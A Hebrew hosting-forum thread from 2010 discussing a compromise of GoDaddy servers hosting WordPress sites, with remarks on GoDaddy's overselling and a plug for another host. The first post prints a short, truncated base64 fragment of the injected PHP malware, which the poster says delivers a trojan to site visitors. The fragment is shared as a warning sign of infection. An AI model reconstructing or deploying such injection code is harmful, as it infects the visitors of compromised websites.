פריצה לשרתי GODADDY - סכנה לבעלי מערכות WordPress - הוסטס

**yonatan** · 27-04-10, 02:29

אולי חדשות ישנות , אבל חשוב לדעת.
אתמול נפרצו מספר שרתים של גודדי, האתרים שנפגעו הם אתרי WORDPRESS בלבד, מדובר בחור אבטחה במערכת WORDPRESS שמאפשר הכנסת קוד זדוני למערכת.

מידע נוסף:

http://blogcastfm.com/announcements/...-this-weekend/

קטע קוד שנמצא :

קוד:

aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJE
dMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jd
Glvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgIC

לקוחות שמאוחסנים ב www.securehost.co.il לא נפגעו מההתקפה המדוברת כלל ( בוצעה בדיקה מקיפה לכלל השרתים ).

אנחנו ממליצים לכולם לעדכן לגירסא החדשה ביותר של WordPress.

dani1001 · 27-04-10, 09:39

ידוע שהשרתים שלהם עם הגנות מהתחת
אני עדיין מתפלא שהם מצליחים להחזיק את הדומיינים אצלהם למרות שכל שני וחמישי פורצים להם לפאנל והפאנל מפסיק לעבוד והם אומרים תחזוקה...

**yonatan** · 27-04-10, 16:07

ציטוט:

נכתב במקור על ידי dani1001

ידוע שהשרתים שלהם עם הגנות מהתחת
אני עדיין מתפלא שהם מצליחים להחזיק את הדומיינים אצלהם למרות שכל שני וחמישי פורצים להם לפאנל והפאנל מפסיק לעבוד והם אומרים תחזוקה...

זה לא כלכך נכון, המערך שרתים שלהם ממש טוב ביחס להמון חברות אחרות, הבעיה שלהם היא OVERSELLING , הם דוחפים לך 3000-4000 לקוחות על כל שרת ומכאן האיטיות המגעילה שלהם, חוץ מזה הפלטפורמה שלהם איכותית ביחס להמון אחרים.

**IgalSt** · 27-04-10, 16:55

ציטוט:

נכתב במקור על ידי yonatan

אולי חדשות ישנות , אבל חשוב לדעת.
אתמול נפרצו מספר שרתים של גודדי, האתרים שנפגעו הם אתרי WORDPRESS בלבד, מדובר בחור אבטחה במערכת WORDPRESS שמאפשר הכנסת קוד זדוני למערכת.

מידע נוסף:

http://blogcastfm.com/announcements/...-this-weekend/

קטע קוד שנמצא :

קוד:

aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJE
dMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jd
Glvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgIC

לקוחות שמאוחסנים ב www.securehost.co.il לא נפגעו מההתקפה המדוברת כלל ( בוצעה בדיקה מקיפה לכלל השרתים ).

אנחנו ממליצים לכולם לעדכן לגירסא החדשה ביותר של WordPress.

תודה יהונתן על העדכון.
מישהו מתנדב להסביר מה צירוף התווים הזה עושה בדיוק?

TsAcH · 08-05-10, 14:18

זה תוקן?

**yonatan** · 08-05-10, 18:36

ציטוט:

נכתב במקור על ידי Exa.co.il

תודה יהונתן על העדכון.
מישהו מתנדב להסביר מה צירוף התווים הזה עושה בדיוק?

זה רק קטע קוד קטן הקוד המלא שמור אצלי מטעמי אבטחת מידע.
מה שהקוד עושה זה הזרקה של טרויאני זדוני לגולשי האתר.

27-04-10, 02:29	# 1
yonatan I am root דירוג מסחר: (0) מיני פרופיל תאריך הצטרפות: Oct 2005 מיקום: אשדוד גיל: 39 הודעות: 3,911	פריצה לשרתי GODADDY - סכנה לבעלי מערכות WordPress אולי חדשות ישנות , אבל חשוב לדעת. אתמול נפרצו מספר שרתים של גודדי, האתרים שנפגעו הם אתרי WORDPRESS בלבד, מדובר בחור אבטחה במערכת WORDPRESS שמאפשר הכנסת קוד זדוני למערכת. מידע נוסף: http://blogcastfm.com/announcements/...-this-weekend/ קטע קוד שנמצא : קוד: aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJE dMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jd Glvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgIC לקוחות שמאוחסנים ב www.securehost.co.il לא נפגעו מההתקפה המדוברת כלל ( בוצעה בדיקה מקיפה לכלל השרתים ). אנחנו ממליצים לכולם לעדכן לגירסא החדשה ביותר של WordPress. __________________ אחסון אתרים - Red Hat Certified עקבו אחרינו בטוויטר!

27-04-10, 09:39	# 2
dani1001 חבר בקהילה דירוג מסחר: (0) מיני פרופיל תאריך הצטרפות: Oct 2009 הודעות: 94	ידוע שהשרתים שלהם עם הגנות מהתחת אני עדיין מתפלא שהם מצליחים להחזיק את הדומיינים אצלהם למרות שכל שני וחמישי פורצים להם לפאנל והפאנל מפסיק לעבוד והם אומרים תחזוקה... __________________ I LOVE SERVERS


	ההרשמה לפורום נפתחה - אפשרות רישום לכל אימייל (דומיינים פרטיים, gmail, הוטמייל..)!

08-05-10, 14:18	# 5
TsAcH חבר חדש דירוג מסחר: (0) מיני פרופיל תאריך הצטרפות: Dec 2008 הודעות: 24	זה תוקן?

חברים פעילים הצופים באשכול זה: 1 (0 חברים ו- 1 אורחים)